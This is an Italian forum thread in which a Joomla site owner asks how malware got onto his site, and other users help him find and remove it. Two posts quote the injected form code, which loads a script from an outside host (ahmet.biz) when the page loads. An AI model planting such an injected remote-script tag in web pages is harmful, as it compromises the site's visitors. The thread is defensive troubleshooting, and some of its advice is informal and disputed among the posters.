Back to top

Autore Topic: malware?!?! ma chi ce l'ha messo???  (Letto 6280 volte)

Offline carorland

  • Appassionato
  • ***
  • Post: 343
  • Sesso: Maschio
    • Mostra profilo
malware?!?! ma chi ce l'ha messo???
« il: 17 Ott 2014, 23:00:40 »
ho un problema, il mio antivirus dice che nel mio sito c'è un malware, e qualche tempo fa anche google lo bloccava... che devo fare, il mio sito è www.gesuilnazareno.org


grazie a tutti
God is love

Offline X-mac

  • Appassionato
  • ***
  • Post: 468
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #1 il: 17 Ott 2014, 23:29:27 »
Scarica i file del,sito e fai una scansione

Offline carlodamo

  • Global Moderator
  • Instancabile
  • ********
  • Post: 3817
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #2 il: 18 Ott 2014, 09:31:46 »
Usa anche questo strumento: http://sitecheck.sucuri.net/
Evisole Web agency a Vicenza

Offline carorland

  • Appassionato
  • ***
  • Post: 343
  • Sesso: Maschio
    • Mostra profilo
God is love

Offline tomtomeight

  • Global Moderator
  • Fuori controllo
  • ********
  • Post: 32046
  • Sesso: Maschio
  • Gli automatismi aiutano ma non insegnano nulla.
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #4 il: 18 Ott 2014, 17:25:09 »
Ciao


Invece di chiederti chi ce l'ha messo, che anche se lo scopri non ti serve a nulla,  chiediti tu cosa hai fatto  per evitarlo, che politica di sicurezza hai adottato, hai tenuto il sito regolarmente aggiornato e ancora hai fatto regolari backup?

Adesso puoi risolvere appunto ripristinando un backup se l'hai, in caso contrario oltre che tentare un improbabile pulizia sarebbe il caso di rifare tutto daccapo.

Offline carorland

  • Appassionato
  • ***
  • Post: 343
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #5 il: 18 Ott 2014, 17:37:06 »
la mia domanda è retorica... si, il sito è aggiornato, ho backup semestrali e invece di sparare a vanvera pregherei di darmi una soluzione valida. Non ci penso proprio di rifare tutto da capo, li c'è il lavoro di una vita di tante persone.


per cui chiedo consigli non giudizi d'altronde il paziente non è mica morto...
grazie. 


p.s. analizzando i miei backup non c'è nessun malware, ho fatto anche come mi ha detto x-mac, ho scaricato il sito e lo analizzato e il tutto risulta pulito ma attraverso l'analisi web mi da gli errori che ho postato...
« Ultima modifica: 18 Ott 2014, 17:41:22 da carorland »
God is love

Offline steganoga

  • Abituale
  • ****
  • Post: 1313
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #6 il: 18 Ott 2014, 17:50:15 »
Codice: [Seleziona]
[quote]<Form class = "arte-ricerca" name = "Cerca" action = "<script type =" text / javascript "src =" http://ahmet.biz/cgi-bin/839vHXnY.php?id=3728753 "> </ script> /index.php/component/search / ">
guarda l'html della tua pagina.

joomla l'avrai aggiornato ma da qualche estensione sono passati
...sono dove non ti aspetti di trovarmi, mi alimento della tua supponenza e disseto la mia curiosità nel silenzio.
Non sono un nemico, considerami un ospite.

Offline X-mac

  • Appassionato
  • ***
  • Post: 468
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #7 il: 18 Ott 2014, 17:51:01 »
il malware che hai sembra che sia qualcosa che linka all'esterno quindi è un po' complicato da vedere.
Se riesci cerca di risalare almeno alle pagine "infette"

Offline steganoga

  • Abituale
  • ****
  • Post: 1313
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #8 il: 18 Ott 2014, 17:59:43 »
Citazione
Se riesci cerca di risalare almeno alle pagine "infette"

... guarda che joomla non ha pagine...

e nessun antivirus ti evidenzia un link come malware, il tool di sucuri lo fa perchè il suo "algoritmo" gli dice che uno script in quel punto non può che essere una somma asinata o un iniezione
...sono dove non ti aspetti di trovarmi, mi alimento della tua supponenza e disseto la mia curiosità nel silenzio.
Non sono un nemico, considerami un ospite.

Offline tomtomeight

  • Global Moderator
  • Fuori controllo
  • ********
  • Post: 32046
  • Sesso: Maschio
  • Gli automatismi aiutano ma non insegnano nulla.
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #9 il: 18 Ott 2014, 18:06:14 »
Non era sparare a vanvera ma se vuoi credilo pure, intanto se dici di avere un backup allora stai tranquillo che il morto resuscita.

Offline X-mac

  • Appassionato
  • ***
  • Post: 468
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #10 il: 18 Ott 2014, 18:30:49 »
... guarda che joomla non ha pagine...

e nessun antivirus ti evidenzia un link come malware, il tool di sucuri lo fa perchè il suo "algoritmo" gli dice che uno script in quel punto non può che essere una somma asinata o un iniezione


questo lo so, l'idea è quella di lavorare in locale e cercare di fare debug attraverso tools di sviluppo. Magari usando Eclipse qualcosa salta fuori.

Offline steganoga

  • Abituale
  • ****
  • Post: 1313
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #11 il: 18 Ott 2014, 18:35:41 »
visto che intorno c'è un link prova per sicurezza a guardare nell'htaccess se lo usi
altrimenti prova a cambiare template e guarda se sparisce
...sono dove non ti aspetti di trovarmi, mi alimento della tua supponenza e disseto la mia curiosità nel silenzio.
Non sono un nemico, considerami un ospite.

Offline tomtomeight

  • Global Moderator
  • Fuori controllo
  • ********
  • Post: 32046
  • Sesso: Maschio
  • Gli automatismi aiutano ma non insegnano nulla.
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #12 il: 18 Ott 2014, 18:36:20 »
Visto che per lo più sono articoli dovrebbe guardare nel db e lì eliminare il codice iniettato, tuttavia anche eliminandoli non sarà poi sicuro da dove sono entrati e certamente l'infezione si ripeterà,  ergo il mio suggerimento di rifare daccapo magari recuperando i contenuti dal db dopo eventuale puluzia.

Offline carorland

  • Appassionato
  • ***
  • Post: 343
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #13 il: 19 Ott 2014, 17:10:12 »
ammettiamo che io abbia trovato il codice melevole, come lo tolgo???
God is love

Offline X-mac

  • Appassionato
  • ***
  • Post: 468
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #14 il: 19 Ott 2014, 17:12:25 »
lo cancelli e basta, modifichi la routine o il punto di ingresso in modo che non possa più accedere almeno da li

Offline carorland

  • Appassionato
  • ***
  • Post: 343
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #15 il: 19 Ott 2014, 17:21:40 »
scusa, mi sono espresso male, dove vado per toglierlo ???

God is love

Offline X-mac

  • Appassionato
  • ***
  • Post: 468
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #16 il: 19 Ott 2014, 17:23:43 »
Visto che per lo più sono articoli dovrebbe guardare nel db e lì eliminare il codice iniettato, tuttavia anche eliminandoli non sarà poi sicuro da dove sono entrati e certamente l'infezione si ripeterà,  ergo il mio suggerimento di rifare daccapo magari recuperando i contenuti dal db dopo eventuale puluzia.


una via potrebbe essere questa,
però dipende da cosa hai trovato

Offline carorland

  • Appassionato
  • ***
  • Post: 343
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #17 il: 19 Ott 2014, 17:35:11 »
posso toglierlo andando nell'html della prima pagina???

God is love

Offline X-mac

  • Appassionato
  • ***
  • Post: 468
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #18 il: 19 Ott 2014, 17:51:06 »
ma lo hai trovato

Offline steganoga

  • Abituale
  • ****
  • Post: 1313
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #19 il: 19 Ott 2014, 17:52:28 »
ma non hai nessun amico che può dargli un occhiata?

"supponiamo" è un cattivo presagio al "cancello roba a caxo"

per trovarlo te l'ho già detto dove potrebbe stare, lascia perdere il database perchè nessun sqlinj può inserire nulla e anche se lo inserisse non succede nulla, basta che vai nel db in un articolo e guardi cosa succede ad incollarci uno script... nulla.
...sono dove non ti aspetti di trovarmi, mi alimento della tua supponenza e disseto la mia curiosità nel silenzio.
Non sono un nemico, considerami un ospite.

Offline carorland

  • Appassionato
  • ***
  • Post: 343
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #20 il: 19 Ott 2014, 18:17:50 »
si questo  e il codice che mi viene rilevato malevole: <Form class = "arte-ricerca" name = "Cerca" action = "<script type =" text / javascript "src ="http://ahmet.biz/cgi-bin/839vHXnY.php?id=3728753 "> </ script> /index.php/component/search / ">
God is love

Offline X-mac

  • Appassionato
  • ***
  • Post: 468
  • Sesso: Maschio
    • Mostra profilo
Re:malware?!?! ma chi ce l'ha messo???
« Risposta #21 il: 19 Ott 2014, 18:20:50 »
ma quell'action chi l'ha fatta?
comunque se è quello devi semplicemente cambiare action
tipo action="tua action"

 



Web Design Bolzano Kreatif